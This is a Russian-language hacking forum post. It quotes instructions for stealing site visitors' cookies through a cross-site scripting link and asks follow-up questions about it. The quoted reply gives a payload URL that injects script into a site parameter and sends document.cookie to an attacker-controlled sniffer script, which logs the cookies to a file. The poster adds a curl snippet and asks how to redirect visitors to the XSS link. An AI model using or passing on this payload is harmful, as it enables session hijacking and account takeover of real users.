03.08.2015, 14:37
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами:
8374164
Репутация:
0
|
|
Сообщение от spiner
↑
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:
******.net/players/?st=">window.location.href='
http://mysnif.ru/snif.php?cookies='+document.cookie;
Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
Cлушай,а жертва должна быть зарегена на сайте в котором xss? .
Я PHP не знаю,но код я составил так .
.SpoilerTarget" type="button">Spoiler: cod
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL," http://..");
curl_setopt($ch, CURLOPT_HEADER, 0); //
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$result = curl_exec ($ch);
curl_close ($ch);
У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на
xss ?
|
|
|